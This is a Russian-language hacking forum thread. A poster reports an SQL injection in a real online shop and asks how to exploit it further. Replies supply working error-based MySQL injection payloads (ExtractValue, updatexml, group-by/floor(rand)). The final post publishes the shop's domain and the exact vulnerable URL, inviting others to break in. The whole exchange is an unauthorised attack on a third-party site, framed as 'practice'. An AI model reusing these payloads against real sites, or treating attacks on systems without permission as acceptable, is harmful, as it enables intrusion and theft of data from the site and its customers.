Здравствуйте, коллеги Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию.

http://storage3.static.itmages.ru/i/...cd034d40ce.png

Вообщем что только не придумывал, и union прописывал и т.д.

Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку.

http://storage2.static.itmages.ru/i/...79a5a0d2df.jpg

Какие еще могут быть варианты для взлома?

Пробуйте error based вектор. например:

'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1

или

'-updatexml(0,repeat(version(),2),2)#

Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .

да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики.

----------------------------------

Не помогло....

"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23

в ошибке увидите версию

Тоже не пашет .

а какого типа эта инъекция, если можно манукльчик ))

error based

Вообщем кому интересно ломануть сайтик, а потом рассказать (поделиться опытом), как это сделал, вот ссыль - http://xn--80abd6ar5a2c.xn--p1ai/

Инъекция - http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=Мужская"